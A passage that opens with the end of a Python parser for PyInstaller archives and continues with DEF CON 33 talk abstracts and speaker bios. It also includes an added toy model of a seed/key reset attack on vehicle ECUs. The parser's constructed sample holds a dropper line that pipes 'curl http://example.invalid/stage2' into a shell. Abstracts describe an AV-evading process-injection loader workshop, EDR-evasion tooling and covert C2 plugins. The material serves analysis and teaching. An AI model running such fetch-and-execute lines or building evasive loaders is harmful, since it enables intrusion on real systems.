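Positions and the TOC offset are relative to the archive start, which is
(cookie end) - (archive length); the archive length includes the cookie.
"""
from __future__ import annotations

import struct
import zlib
from dataclasses import dataclass
from typing import List, Tuple

MAGIC = b"MEI\014\013\012\013\016"
COOKIE_FMT = "!8sIIii64s"
COOKIE_LEN = struct.calcsize(COOKIE_FMT)      # 88
ROW_HEAD_FMT = "!iIIIBc"
ROW_HEAD_LEN = struct.calcsize(ROW_HEAD_FMT)  # 18

# PyInstaller typecodes; 's' is the entry an analyst wants first
TYPECODES = {"s": "script", "m": "module", "z": "PYZ archive", "b": "binary",
             "x": "data", "o": "option", "d": "dependency"}


@dataclass
class Entry:
    name: str
    typecode: str
    position: int
    compressed_len: int
    uncompressed_len: int
    compressed: bool


def parse_toc(blob: bytes) -> Tuple[int, List[Entry]]:
    """Return (archive_start, entries); raise if no cookie is present."""
    cookie_pos = blob.rfind(MAGIC)
    if cookie_pos < 0:
        raise ValueError("no PyInstaller cookie found; not a PyInstaller wrapper")
    _, arch_len, toc_off, toc_len, _pyver, _pylib = struct.unpack_from(COOKIE_FMT, blob, cookie_pos)
    archive_start = cookie_pos + COOKIE_LEN - arch_len
    entries: List[Entry] = []
    pos = archive_start + toc_off
    end = pos + toc_len
    while pos < end:
        row_len, dpos, clen, ulen, flag, tcode = struct.unpack_from(ROW_HEAD_FMT, blob, pos)
        name = blob[pos + ROW_HEAD_LEN : pos + row_len].rstrip(b"\0").decode("utf-8")
        entries.append(Entry(name, tcode.decode("ascii"), dpos, clen, ulen, flag == 1))
        pos += row_len
    return archive_start, entries


def extract(blob: bytes, archive_start: int, entry: Entry) -> bytes:
    """Slice one entry out of the archive and inflate it if it was zlib'd."""
    start = archive_start + entry.position
    raw = blob[start : start + entry.compressed_len]
    data = zlib.decompress(raw) if entry.compressed else raw
    if len(data) != entry.uncompressed_len:
        raise ValueError(f"{entry.name}: expected {entry.uncompressed_len} bytes, got {len(data)}")
    return data


def build_sample() -> bytes:
    """Constructed sample 'binary': junk stub + a two-entry CArchive.
    Real builds put a marshalled code object in the 's' entry; plain source
    is used here so the extraction result is readable."""
    stub = b"\xcf\xfa\xed\xfe" + b"\x00" * 60                  # fake Mach-O header bytes
    script = b"import os\nos.system('curl http://example.invalid/stage2 | sh')\n"
    config = b'{"c2": "example.invalid"}'
    items = [("dropper", b"s", script, True), ("config.json", b"x", config, False)]
    data, toc = b"", b""
    for name, tcode, content, compress in items:
        stored = zlib.compress(content) if compress else content
        nm = name.encode("utf-8") + b"\0"
        row_len = ROW_HEAD_LEN + len(nm)
        row_len += -row_len % 16                                 # null-pad rows to 16 bytes
        toc += struct.pack(ROW_HEAD_FMT, row_len, len(data), len(stored), len(content), int(compress), tcode)
        toc += nm.ljust(row_len - ROW_HEAD_LEN, b"\0")
        data += stored
    arch_len = len(data) + len(toc) + COOKIE_LEN
    cookie = struct.pack(COOKIE_FMT, MAGIC, arch_len, len(data), len(toc), 311, b"libpython3.11.dylib")
    return stub + data + toc + cookie


if __name__ == "__main__":
    blob = build_sample()
    start, entries = parse_toc(blob)
    for e in entries:
        print(f"{e.typecode} {TYPECODES.get(e.typecode, '?'):<12} {e.name:<14} {e.uncompressed_len:>6} bytes")
    script_entry = next(e for e in entries if e.typecode == "s")
    print(extract(blob, start, script_entry).decode())
```

The reader relies only on the cookie and each row's length field, so it does not care how the rows were padded or what the native stub in front of the archive looks like, which is exactly why the wrapper's machine code never needs to be read.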
Patrick Wardle is the founder of the Objective-See Foundation, the CEO/Cofounder of DoubleYou, and the author of "The Art of Mac Malware" book series. Having worked at NASA and the NSA, as well as presenting at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Passionate about macOS security, Patrick spends his days discovering Apple 0days, studying macOS malware, and releasing free open-source security tools to protect Mac users.
Blackdagger is a next-gen cybersecurity workflow automation framework built to streamline and accelerate complex operations across DevSecOps, MLOps, MLSecOps, and Continuous Automated Red Teaming (CART). It uses a declarative YAML-based Directed Acyclic Graph (DAG) system to define, visualize, and execute automated pipelines — no heavy scripting required. With a built-in web UI, a containerized red teaming toolkit called Blackcart, and integration with GitHub Actions for OPSEC-friendly task execution, Blackdagger empowers teams to deploy, manage, and scale cyber workflows in real-time. Attendees will see live demos of red team pipelines, stealthy GitHub-based automation, and browser-based workflow execution via the Blackdagger Web Kit. Whether you're defending or attacking, Blackdagger turns security automation into an intuitive, visual experience — backed by real-world NATO and defense applications.
Speakers: Mahmut "ErdemOzgen" Erdem Ozgen, Ata Seren
Mahmut is a computer engineer from Ankara, Turkey, specializing in software engineering, cybersecurity, ML systems, and DevSecOps. A Bahcesehir University graduate (2015-2020), he has played key roles at HAVELSAN, developing secure DevSecOps pipelines and cybersecurity architectures for Turkish Armed Forces, contributing to national security systems advancement. He has extensive experience with machine learning and LLMs, applying theoretical concepts to practical solutions. As a student research assistant at Istanbul Big Data Education and Research Center, he implemented learning-based algorithms for drone routing and conducted text processing and sentiment analysis. His technical expertise encompasses Python, Go, C/C++, Java, JavaScript, Docker, Kubernetes, Terraform, and blockchain technologies. Fluent in English and Turkish, he has received notable recognition, including first place in the Presidency of Defence Industries Cyber Capstone Projects and a full scholarship from Bahcesehir University. Additionally, he has served on the NATO Locked Shields exercise green team, implementing ML and LLM-based systems, and currently serves as a red team capability leader in the NATO CWIX exercise.
SpeakerBio: Ata Seren
Ata is a specialized cyber security engineer with expertise in application security, DevSecOps, and penetration testing. Currently pursuing a Master’s degree in Cyber Security at Middle East Technical University, his thesis focuses on static application security testing, tool mechanisms, and innovative approaches in the field. With professional experience at HAVELSAN, he has contributed to significant NATO projects and open-source cybersecurity tools including DevSecOpsBuilder, Blackcart, and Blackdagger. His involvement in the NATO Locked Shields exercise in 2024 and 2025 demonstrates his practical expertise in cyber defense operations at an international level. A recognized voice in the cybersecurity community, he has presented the Blackdagger tool at Black Hat USA, Europe, and Asia conferences alongside his colleague. Most recently, he spoke at CyCon 2025, introducing a new cybersecurity framework to industry professionals. His technical proficiency spans multiple programming languages including Python, Golang, and C/C++, complemented by extensive knowledge of cybersecurity fundamentals, cloud security, and AI/ML approaches to security challenges. He is currently expanding his red teaming capabilities while studying for the OSCP certification from OffSec.
Tanker trailers? Turns out those aren't just big, dumb hunks of metal. They have a powerline network, PLC4TRUCKS, which is unintentionally accessible wirelessly (CVE-2020-14514 and CVE-2022-26131). We found new trailer brake controllers using diagnostic protocol KWP2000, secured with access control by seed-key (a challenge-response protocol). We'll show how to use Wireshark to analyze the diag. traffic. We'll discuss why randomness is critical for any challenge-response protocol.
We'll cover two ways to bypass this access control: using an SMT solver to crack the routine from a few request-response pairs (automated with AHK), and a classic reset attack that makes seeds entirely predictable. This second way allows for a blind, wireless attack, a finding now recognized as CVE-2024-12054. We'll detail how we ran timing search 'campaigns' with a custom sigrok decoder to PoC it.
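The reset attack above generalizes to any challenge-response scheme whose challenge is drawn from state that a power cycle returns to a known value. The following Python, added here and not drawn from the talk or from NMFTA's tooling, models a toy KWP2000-style seed/key exchange against two ECUs: one seeds its generator from a constant at boot, the other from the OS CSPRNG. The key routine is a placeholder HMAC under a secret the attacker never learns; the point is that a perfectly strong key function is still defeated by a replayable seed. Seed width, the one-attempt-per-seed rule and the reset mechanism are assumptions of the model, not details of the brake controller.

```python
"""Toy seed/key access control (KWP2000 SecurityAccess style), constructed to
show that an unpredictable seed matters more than the secrecy of the key
routine. Nothing here describes a real trailer brake controller."""
import hashlib
import hmac
import os
import random
from typing import List, Tuple

KEY_SECRET = b"ecu-secret-not-known-to-attacker"  # assumption: baked into ECU firmware


def key_routine(seed: int) -> int:
    """Placeholder key derivation the ECU expects; strong on its own."""
    mac = hmac.new(KEY_SECRET, seed.to_bytes(4, "big"), hashlib.sha256).digest()
    return int.from_bytes(mac[:4], "big")


class Ecu:
    """Base ECU: issue a 32-bit seed, accept one key for the most recent seed."""

    def __init__(self) -> None:
        self.reset()

    def reset(self) -> None:
        """Power-on reset: lock the ECU and re-initialise the seed source."""
        self.unlocked = False
        self._seed = None
        self._init_seed_source()

    def _init_seed_source(self) -> None:
        raise NotImplementedError

    def _next_seed(self) -> int:
        raise NotImplementedError

    def request_seed(self) -> int:          # SecurityAccess, requestSeed
        self._seed = self._next_seed()
        return self._seed

    def send_key(self, key: int) -> bool:   # SecurityAccess, sendKey
        ok = self._seed is not None and key == key_routine(self._seed)
        self._seed = None                    # one attempt per issued seed
        self.unlocked = ok
        return ok


class WeakSeedEcu(Ecu):
    """Seeds from a PRNG whose state is a constant at boot, so every power
    cycle replays the same seed sequence (the reset-attack pattern)."""

    def _init_seed_source(self) -> None:
        self._rng = random.Random(0x5EED)    # constructed: fixed boot state

    def _next_seed(self) -> int:
        return self._rng.getrandbits(32)


class StrongSeedEcu(Ecu):
    """Seeds from the OS CSPRNG; a reset does not make the next seed predictable."""

    def _init_seed_source(self) -> None:
        pass

    def _next_seed(self) -> int:
        return int.from_bytes(os.urandom(4), "big")


def first_seeds(ecu_cls, power_cycles: int) -> List[int]:
    """First seed issued after each of `power_cycles` resets."""
    ecu = ecu_cls()
    seeds = []
    for _ in range(power_cycles):
        ecu.reset()
        seeds.append(ecu.request_seed())
    return seeds


def replay_after_reset(ecu_cls) -> Tuple[bool, bool]:
    """Attacker sniffs one legitimate seed/key pair right after power-on, then
    forces a reset and replays the captured key without knowing key_routine.
    Returns (legitimate unlock succeeded, replay succeeded)."""
    ecu = ecu_cls()
    seed = ecu.request_seed()                # legitimate diagnostic tool asks for a seed...
    captured_key = key_routine(seed)         # ...and answers; attacker sniffs both frames
    legit_ok = ecu.send_key(captured_key)

    ecu.reset()                              # attacker power-cycles the ECU
    ecu.request_seed()                       # seed re-issued (same value on the weak ECU)
    replay_ok = ecu.send_key(captured_key)   # replay: no knowledge of the routine needed
    return legit_ok, replay_ok


if __name__ == "__main__":
    for cls in (WeakSeedEcu, StrongSeedEcu):
        distinct = len(set(first_seeds(cls, 5)))
        print(f"{cls.__name__}: distinct first seeds over 5 resets = {distinct}, "
              f"replay after reset = {replay_after_reset(cls)[1]}")
```

The same model shows why a small seed space is a second, independent problem: even with a CSPRNG, a 16-bit seed lets an attacker who has captured enough seed/key pairs simply wait for a repeat, so both unpredictability and width have to be checked when reviewing a seed-key implementation.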
The trailer brake controller is also at risk from trailer-installed telematics devices too. We'll show how to use Scapy Automotive's UDS scanner on a faked CAN bus for PLC4TRUCKS (plus modify that for a known seed-key routine) so we can get a picture of that attack surface.
This and the previous CVEs are a result of the heavy vehicle testing we do. We'll share some details of how we do onsite truck tests and how we do bench tests.
SpeakerBio: Ben Gardiner
Ben is a Senior Cybersecurity Research Engineer at the National Motor Freight Traffic Association, Inc. (NMFTA)™ specializing in hardware and low-level software security. He has held security assurance and reversing roles at a global corporation, as well as worked in embedded software and systems engineering roles at several organizations.
Ben has conducted workshops and presentations at numerous cybersecurity events globally, including the CyberTruck Challenge, GENIVI security sessions, Hack in Paris, HackFest, escar USA and DEF CON.
Ben holds a M.Sc. Eng. in Applied Math & Stats from Queen’s University. In addition to speaking on the main stage at DEF CON, Ben is a volunteer at the DEF CON Hardware Hacking Village (DC HHV) and Car Hacking Village (CHV). He is GIAC GPEN and GICSP certified, chair of the SAE TEVEES18A1 Cybersecurity Assurance Testing TF (published J3322), a contributor to several American Trucking Associations (ATA) Technology & Maintenance Council (TMC) task forces, ISO WG11 committees, and a voting member of the SAE Vehicle Electronic Systems Security Committee.
Tactic activity that can run for the length of the village each day. CTF activity where attendees can use BloodHound Enterprise in a simulated environment to gain flags. The CTF window is 20 minutes for each registered user.
Speakers: Hugo van den Toorn, Joey Dreijer
Hugo is a former Chief Information Security Officer and has now transitioned back to helping other organizations understand adversary tradecraft. With over twelve years of experience in the information security industry, he has a solid technical and executive background as a hands-on security leader.
Hugo has experience with and a keen interest in social engineering, phishing and physical penetration testing. Nowadays, Hugo takes pride and joy in helping individual team members and the business grow. With a strong technical foundation, Hugo combines his passion for security, teaching and hacking with a drive for continuous improvement and optimization of people, processes and technology.
SpeakerBio: Joey Dreijer
Attributing cyber threats to a specific nation-state remains one of the most complex challenges in cybersecurity. Cyber attribution relies on analyzing digital artifacts, infrastructure patterns, and adversary tactics, none of which provide definitive proof on their own. Threat actors continuously evolve, adopting new methodologies and obfuscation techniques that make attribution increasingly difficult. Over the past decade, North Korea’s cyber operations have transformed from rudimentary attacks into highly sophisticated campaigns that rival the capabilities of established cyber powers. Initially, DPRK’s cyber program consisted of loosely organized groups with limited technical capacity, but today, these actors operate under a structured, state-controlled framework with clear strategic objectives. This research presents an in-depth analysis of how DPRK threat actors have adapted, restructured, and collaborated, shedding light on the complexities of nation-state attribution.
SpeakerBio: Seongsu Park, APT Research Team, Staff Threat Researcher at Zscaler
Seongsu Park (@unpacker) is a passionate researcher in malware analysis, threat intelligence, and incident response with over a decade of experience in cybersecurity. He has extensive experience in malware research, research into evolving attack vectors, and threat intelligence, with a heavy focus on responding to highly skilled North Korean threat actors.
He now works on the Zscaler APT Research team as a Staff Threat Researcher and focuses on analyzing and tracking security threats in the APAC region.
BOAZ (Bypass, Obfuscate, Adapt, Zero-Trust) evasion was inspired by the concept of a multi-layered approach, the evasive counterpart of defence-in-depth, first proposed in a presentation at BH USA14. BOAZ was developed to provide greater control over combinations of evasion methods, enabling more granular evaluations against antivirus and EDR. It is designed to bypass pre-execution, execution-time, and post-execution detections that span signature, heuristic, and behavioural detection mechanisms. BOAZ accepts either an x86/x64 binary (PE) or a raw payload as input and outputs an EXE or DLL. It has been tested on separate Windows 11 Enterprise, Windows 10, and Windows Server 2022 VMs with 14 desktop AVs and 7 EDRs installed, including Windows Defender, Norton, BitDefender, Sophos, and ESET. The design of BOAZ evasion is modular, so users can add their own toolset or techniques to the framework. BOAZ is written in C++ and C and uses Python3 as the main linker to integrate all modules. There have been significant improvements implemented since its inception. The new version of the BOAZ evasion tool, set for release at DEF CON 33, will feature three novel threadless process injection primitives, along with newly implemented loaders and behavioural evasion techniques.
SpeakerBio: Thomas "XM20" Xuan Meng
Thomas is a cybersecurity researcher, reverse engineer, and developer with a diverse background in policing, academia, and civil service. He holds a PhD in Computational Engineering, an MPhil in Criminological Research, and a BSc in Mathematics, and was awarded a university medal in Cybersecurity from Edinburgh Napier University.
SpeakerBio: Drinor Selmanaj
Drinor Selmanaj is a cybersecurity pioneer, Forbes Technology Council member, and published author. As Founder of Sentry, he leads an elite team securing unicorn-stage companies and Big Four clients across critical sectors. He also founded the Cyber Academy, where his hands-on training programs and AI-driven edtech solutions have launched thousands of careers and are redefining how cybersecurity talent is developed worldwide.
Corey Ball is the founder and CEO of hAPI Labs, where he provides penetration testing services. He is the author of Hacking APIs, founder of APIsec University, and has over fifteen years of experience working in IT and cybersecurity. Corey holds the OSCP, CCISO, CISSP, and several other industry certifications.
SpeakerBio: Chris DeCarmen
As a former enlisted Marine, Human Rights volunteer in Cameroon, Ukrainian Peace Corps member, and Army Officer, I bring a diverse background to my current role as a Network Analyst. My lifelong passion for computers—rooted in the era of dial-up—drove me to create the Cyber Calendar. This project aims to illuminate essential cyber practices and address the complacency creep that often undermines our security.
Eugene Lim is a security researcher and white hat hacker. From Amazon to Zoom, he has helped secure applications from a range of vulnerabilities. His work has been featured at top conferences such as Black Hat, DEF CON, and industry publications like WIRED and The Register.
SpeakerBio: Laura S. Scherling, EdD
Laura Sang Hee Scherling, EdD, is a director and adjunct lecturer at Columbia University. Scherling is the founder of the Cyber Care Institute and co-founder of Civic Art Lab. Her previous books include Ethics in Design and Communication, Digital Transformation in Design, and Product Design, Technology, and Social Change. She is a contributor to Tech Policy Press and Design Observer. Scherling is passionate about tech ethics, Internet freedom, and cybersecurity awareness.
Accepted Payment Methods: Cash, Venmo, and Paypal
Kyle Cucci is a malware analyst and detection engineer with Proofpoint’s Threat Research team. Previously, he led the forensic investigations and malware research teams at a large global bank. Kyle is the author of the book "Evasive Malware: A Field Guide to Detecting, Analyzing, and Defeating Advanced Threats" and is a regular speaker at conferences, speaking on topics like malware analysis, offensive security, and security engineering. In his free time, Kyle enjoys contributing to the community via open source tooling, research, and blogging.
Micah is a member of the Lockdown Systems collective. He's a coder, a security researcher, and an independent journalist. He develops open source privacy and security tools, and he's done a lot of work related to journalism and whistleblowing. He’s the former director of infosec for The Intercept. He wrote a book that teaches people how to analyze hacked and leaked datasets, Hacks, Leaks, and Revelations. He really doesn’t like the technofascist future we’ve all been forced into.
Patrick Wardle is the founder of the Objective-See Foundation, the CEO/Cofounder of DoubleYou, and the author of "The Art of Mac Malware" book series. Having worked at NASA and the NSA, as well as presenting at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Passionate about macOS security, Patrick spends his days discovering Apple 0days, studying macOS malware, and releasing free open-source security tools to protect Mac users.
SpeakerBio: Deviant Ollam, Director of Education at Red Team Alliance
While paying the bills as a physical penetration specialist with The CORE Group and the Director of Education for Red Team Alliance, Deviant Ollam also sat on the Board of Directors of the US division of TOOOL -- The Open Organisation Of Lockpickers -- for 14 years... acting as the nonprofit's longest-serving board member. His books Practical Lock Picking and Keys to the Kingdom are among Syngress Publishing's best-selling pen testing titles. In addition to being a lockpicker, Deviant is also a SAVTA certified Professional Safe Technician, a GSA certified Safe and Vault Inspector, member of the International Association of Investigative Locksmiths, a Life Safety and ADA consultant, and an NFPA Fire Door Inspector. At multiple annual security conferences Deviant started Lockpick Village workshop areas, and he has conducted physical security training sessions for Black Hat, the SANS Institute, DeepSec, ToorCon, HackCon, ShakaCon, HackInTheBox, ekoparty, AusCERT, GovCERT, CONFidence, the FBI, the NSA, DARPA, the National Defense University, Los Alamos National Lab, the United States Naval Academy at Annapolis, and the United States Military Academy at West Point.
In his limited spare time, Deviant enjoys loud moments with lead acceleration and quiet times with podcasts. He arrives at airports too early and shows up at parties too late, but will promptly appear right on time for tacos or whiskey.
SpeakerBio: Audrey Adeline
Audrey is currently a security researcher at SquareX. She leads the Year of Browser Bugs (YOBB) project which has disclosed multiple major architectural browser vulnerabilities to date. Key discoveries from YOBB include Polymorphic Extensions, Browser-native Ransomware and Browser Syncjacking, all of which have been covered by major publications such as Forbes, Bleeping Computer and Mashable. She has also presented her research as a speaker at BSides SF and Stanford University, and is part of the HQ Committee of Women in Security and Privacy (WISP). Prior to SquareX, Audrey was a cybersecurity investor at Sequoia Capital, investing in software and cybersecurity startups.
SpeakerBio: Garrett Gee
Garrett Gee is a USA Today bestselling author and 7-figure entrepreneur, recognized for his expertise in cybersecurity and hacking. As the founder and owner of Hacker Warehouse, he has established a premier destination for computer security tools, serving clients from Fortune 100 companies to government agencies.
With over 20 years of cybersecurity experience, Gee has become a sought-after consultant in the industry. He is the author of the bestselling book “The Hacker Mindset,” a transformative guide that empowers individuals to break free from conventional constraints and achieve their personal and professional goals.
As an international speaker and media expert, Garrett actively engages with a community of learners and hackers, promoting continuous growth and innovation in both cybersecurity and personal development.
For more about Garrett visit https://GarrettGee.com
Back in 2020 the Brazilian Central Bank launched PIX, a real-time wire transfer and payment protocol that has been adopted by the Brazilian population, and nowadays PIX represents the most used payment method in the country. However, local cybercriminals quickly adapted and leveraged PIX for malicious activity. Since then, criminal activity in Brazil has ramped up, from kidnapping and theft of mobile phones to money laundering "on steroids" and targeted banking trojans. Instant wire transfers made fraudulent transactions run faster than the speed of light; they were almost impossible to stop, and the stolen funds almost impossible to recover. A criminals' paradise. In this presentation we will discuss the fraud schemes that were fueled by PIX and the ones that emerged since then, haunting the local population.
SpeakerBio: Anchises Moraes, Cyber Threat Intel Lead at APURA Cyber Intelligence SA
Lord Anchises Moraes, Brazil-born of the house Hacker, First of His Name, Born in Computer Science, Cybersecurity Workaholic, Lead of the Threat Intel Realm, founder of Security BSides São Paulo, Supreme Chancellor of Garoa Hacker Clube, He for She volunteer at WOMCY (LATAM Women in Cybersecurity), Mente Binária NGO Counselor, Security Specialist and Protector of the Cyber Space realm.
It was the summer of 2016, and like everyone else, I was out playing Pokémon Go. Except my rural location barely spawned anything interesting. Naturally, I dove into the game's code, reverse engineered its protocol, and built a custom Pokémon scanner.
But the story doesn't end there. One day, a switch was flipped, enabling a fancy new anti-cheating feature that locked out any custom implementations.
In this talk, I'll begin by exploring how mobile games like Pokémon Go handle communication through specialized protocols—and how I replicated that behavior to build a scanner. Then, I'll walk you through a 4-day hacking marathon where I teamed up with a group of like-minded enthusiasts to overcome the anti-cheating mechanism that nearly broke our scanners.
We'll examine how mobile games attempt to thwart such applications, unraveling the anti-cheating mechanism that was deployed by Pokemon Go. We'll explore how we managed, through obfuscated cryptographic functions, unexpected use of smartphone peripherals and hidden protobuf definitions, to break the anti-cheating system and release a publicly available API for the game's protocol.
Almost a decade later, the full story is ready to be told. Join me for an inside look at the anti-cheating mechanisms of online mobile games—and how to hack them.
SpeakerBio: Tal Skverer
In the past decade, Tal turned his hacking hobby into a career. His experience covers reverse engineering, malware analysis, embedded security, web hacking, cryptography, and computational complexity. He also teaches a biannual workshop on assembly, reverse engineering x86/x64, and blackbox research.
Tal holds an M.Sc. in Theoretical Computer Science from the Weizmann Institute.
Currently, Tal is the Head of Research at Astrix Security, where, among other things, he discovers vulnerabilities in how cloud providers implement connectivity between (and by) non-human identities.
Some of the things Tal did in the past:
Hacked vehicle infotainment systems at his previous job.
Was a part of the “Unknown6” research group that broke PokemonGo’s anti-cheating system in 2016.
Turned a OnePlus 5T whose screen he accidentally broke into an ad blocker for his home network, as well as a meta search engine focused on ultimate privacy.
Presented at several conferences including DEFCON, RSAC, BSides, and OWASP chapters.
Conducted open-heart surgery on a (1 month off warranty) Nintendo Switch to replace a defective part, which highlights the importance of the “Right to Repair” movement.
Trying to break into cybersecurity? Forget the hype. This panel cuts through the noise to show you what actually works: what roles are out there, what skills and certs are worth your time, how to build a real resume, and how to find your people in the community. We’ll talk job hunting, self-study, mentorship, influencers (the good and the grifty), and how to avoid wasting time and money. Ends with an open Q&A. No gatekeeping. No fluff.
Speakers: Eva Benn, Rosie "Lady Cyber Rosie" Anderson, Tib3rius
Eva Benn is a Principal Security Program Manager for the Microsoft Security and Response Center. Eva has spent most of her security career in red teaming and penetration testing, both as a people leader and hands-on practitioner. Before joining Microsoft, she worked in Big 4 cybersecurity consulting, leading global penetration testing and cybersecurity initiatives across various industries. She is a globally recognized security leader, holding an extensive list of industry certifications, including CISSP, CEH, CCSP, Security+, GSEC, GCIH, GSTRT, GPEN, GWAPT, GRTP, etc.
SpeakerBio: Rosie "Lady Cyber Rosie" Anderson, Organiser at Manchester 2600
Rosie Anderson is Head of Strategic Solutions for th4ts3cur1ty.company, AKA Magical Genie Person. Having previously spent two decades talking to businesses to solve their hiring challenges, and helping people to break into cyber security as a recruiter, Rosie now uses those skills to help businesses solve their cybersecurity challenges. Rosie also founded BSides Lancashire, is a Director of BSides Leeds and restarted the Manchester 2600 Hacker Community, the only 2600 to be run by two women in its 40-year history. She was awarded Most Inspiring Woman in Cyber Security for 2024 and Cyber Newcomer for 2025.
Rosie has been a mentor for Capslock, a cyber training programme, for over two years, and is also part of the Ethical Council for Hacking Games. Giving back is important to her, and she loves the pay-it-forward mentality.
SpeakerBio: Tib3rius, Cybersecurity Content Creator
Tib3rius is a professional penetration tester who specializes in web application hacking, though his background also includes network penetration testing. He is OSCP certified, and likes developing new tools for penetration testing, mostly in Python. He helps run an OSCP prep Discord server, and enjoys passing on his knowledge to students who have a passion for information security.
Malicious packages have grown 156% year over year, and supply chain attacks cost organizations $41 billion in 2023 (projected to reach $81 billion by 2026). This session underscores the urgent need to re-examine our defensive postures for software supply chain security by taking an offensive security perspective.
Speakers: Roni "lupin" Carta, Adnan Khan
Roni Carta, known as Lupin and co-founder of Lupin & Holmes, is an ethical hacker specializing in offensive cybersecurity. He has a strong background in bug bounty hunting, including a $50,000 reward for hacking Google AI, red teaming at ManoMano, and significant research into software supply chain vulnerabilities, notably presenting at DEF CON 32 and recently reporting a hack of Google's AI Gemini. His diverse technical skills range from ATO and RCE exploits to supply chain security, earning him recognition in various cybersecurity competitions.
SpeakerBio: Adnan Khan, AWS
Browser extensions have become increasingly popular for enhancing the web browsing experience. Common examples are ad blockers, cryptocurrency wallets, and password managers. At the same time, modern websites frequently display intrusive elements, such as cookie consent banners, newsletter subscription modals, login forms, and other elements that require user interaction before the desired content can be displayed.
In this talk, I will present a new technique based on clickjacking principles that targets browser extensions, where I used fake intrusive elements to enforce user interaction. In my research, I tested this technique on the 11 most widely used password managers, which resulted in discovering multiple 0-day vulnerabilities that could affect tens of millions of users. Typically, just one click was required from a user to leak their stored private information, such as credit card details, personal data or login credentials (including TOTP). In some cases, it could lead to the exploitation of passkey authentication.
The described technique is general and can be applied to browser extensions beyond password managers, meaning other extensions may also be vulnerable to this type of attack. In addition to describing several methods of this technique, I will also recommend mitigations for developers to protect their extensions against this vulnerability.
SpeakerBio: Marek Tóth
Marek Tóth is a security researcher from the Czech Republic specializing in web application security. In his free time, he conducts independent research and reports critical vulnerabilities that could be exploited by attackers, with a recent focus on Czech companies. He shares interesting findings on his personal website and YouTube channel, or presents them at conferences, primarily at OWASP Chapter meetups.
[Overview]
Malware analysis often focuses on detonation, leaving new defenders and red-teamers wondering how a loader is actually assembled. In this accelerated, beginner-friendly, two-hour hands-on workshop, participants start with a ready-to-build Visual Studio solution and finish with a fully functional Windows 11 process-injection loader written in C. We focus on the classic three-call technique: VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread, plus a quick single-byte XOR obfuscation pass and a file bloating operation. All workshop time is devoted to getting a working loader, testing it against Windows Defender, and understanding each step well enough that participants can expand beyond it.
[Course Outline]
Environment Jump-Start
0.1 Cover Windows 11 snapshot with tools and skeleton code.
0.2 Confirm build of Loader.sln.
Loader Fundamentals
1.1 Loader vs payload overview.
1.2 Memory layout and why VirtualAllocEx / WriteProcessMemory / CreateRemoteThread works.
Hands-On Build
2.1 VirtualAllocEx: reserve RWX in target.
2.2 WriteProcessMemory: copy shellcode.
2.3 CreateRemoteThread: execute and watch notepad.exe execute.
2.4 Breakpoint demo in x64dbg.
Evasion
3.1 Wrap shellcode in XOR decoder stub.
3.2 Bloat file with appended null bytes.
3.3 Show Defender detection before and after.
Wrap-Up and Next Steps
4.1 Provide code branches: indirect-syscalls, AMSI-bypass.
4.2 Safe research and legal reminders.
4.3 Recommended reading links.
Malware developer and vulnerability researcher with a focus on red team tooling. A purveyor of CTFs and watcher of shellcode pop, they enjoy crafting PoCs and designing CTF challenges for the community. Their current research explores Windows malware development, covert communication channels, and fuzzing techniques.
Let’s face it — traditional HTTP C2 is burning out. Between aging domains, TLS cert management, sandbox fingerprinting, and blue teams getting smarter at categorizing traffic and infrastructure, your custom C2 feels less covert and more like a liability. Red teams and threat actors alike are shifting toward living off legitimate services — AWS, GitHub, Box, Notion, whatever blends in — but building solutions that are custom to a single C2 framework? Let’s stop doing that. Let’s share the fun! C4 (Cross-Compatible Command & Control) is here to change that. It’s a modular toolkit of WASM-powered plugins that makes external C2 easy to implement, regardless of your implant's language or target OS. Whether you’re writing in C, Rust, Go, Python, C#, or something else entirely, C4 plugins can be loaded directly into your implant and run on Windows, macOS, or Linux. But the real game-changer? C4 provides a single, centralized collection of over 10 fully-documented, operationally-ready external C2 modules — not just proof-of-concepts, but production-level integrations with trusted sites that fly under the radar. No more hunting through GitHub repos, hand-rolling fragile API calls, or hacking together glue code for every new environment. Stop reinventing external C2 and start planting some C4 in your implants!
SpeakerBio: Scott "ScottCTaylor12" Taylor, Senior Red Team Operator at Sony's Global Threat Emulation
Scott Taylor is a Senior Red Team Operator on Sony's Global Threat Emulation team. Scott has previously worked at the MITRE Corporation and T. Rowe Price focused on emulating adversary behaviors. While Scott has been a technical professional for a decade, only the second half was focused on offensive security. He started as a Linux system administration intern where he learned to build before later learning to break. Scott leverages his system administration background in his offensive security career where he passionately researches command and control (C2) infrastructure for red team operations. Open-source publications by Scott include custom C2 channels for popular C2 frameworks, leveraging cloud services for C2, and automating red team infrastructure deployment.
Dive into the world of Operational Technology (OT) adversary emulation — no racks of hardware required. With Caldera for OT (C4OT) and our new virtual device simulators, you can explore the inner workings of OT network communications from the comfort of your own home lab. The biggest industrial control systems incidents — FrostyGoop, PIPEDREAM, Industroyer — didn’t rely on flashy zero-days to impact physical systems. Instead, they used native OT protocols to send valid messages with malicious intent. Now, with C4OT, you can step into the attacker’s shoes and explore the quirks and capabilities of protocols like Modbus, DNP3, and IEC61850. No hardware? No problem. No experience? Even better. In this session, we’ll show you how to get started with adversary emulation against simulated OT devices, unlocking a hands-on environment to test your attacks, validate your defenses, and gain practical insights into the world of industrial cybersecurity. Whether you’re a defender looking to understand the threats, a researcher diving into OT protocol behavior, or a red-teamer eager to sharpen your skills, C4OT gives you the tools to experiment safely and effectively. Join us to see how C4OT is revolutionizing adversary emulation for OT — one packet at a time.
Speakers: Devon Colmer, Tony Webber
Devon serves as the lead for Caldera for operational technology (OT) within MITRE’s Critical Infrastructure Protection Innovation Center (CIPIC). He specializes in OT adversary emulation and detection engineering, leading the development of OT plugins for MITRE’s Caldera platform. Beyond Caldera, he is researching a common data model for OT protocols to lower the barrier of entry for OT network defenders.
SpeakerBio: Tony Webber
Tony is the lead for countermeasures for operational technology in MITRE’s Critical Infrastructure Protection Innovation Center (CIPIC). His work has spanned systems engineering, solution prototyping, capabilities development, and deployment of cybersecurity and cyber situational awareness solutions for defending industrial control systems. His current focus is adversary emulation for ICS and space systems.
Join Call Center Village at Party Line, a carefully-crafted telephony-themed party open to all DEF CON 33 attendees. Help us celebrate the human operators who keep call centers and answering services private, usable, and accessible. Between the illuminated telephone decorations and the sponsor-supplied drink-ticket drops, you're bound to find something to dial up the fun.
On Day 2 of DEFCON, bring your resume for a comprehensive review by industry professionals. Get personalized feedback and tips to enhance your resume, making it stand out to potential employers in the cybersecurity field.
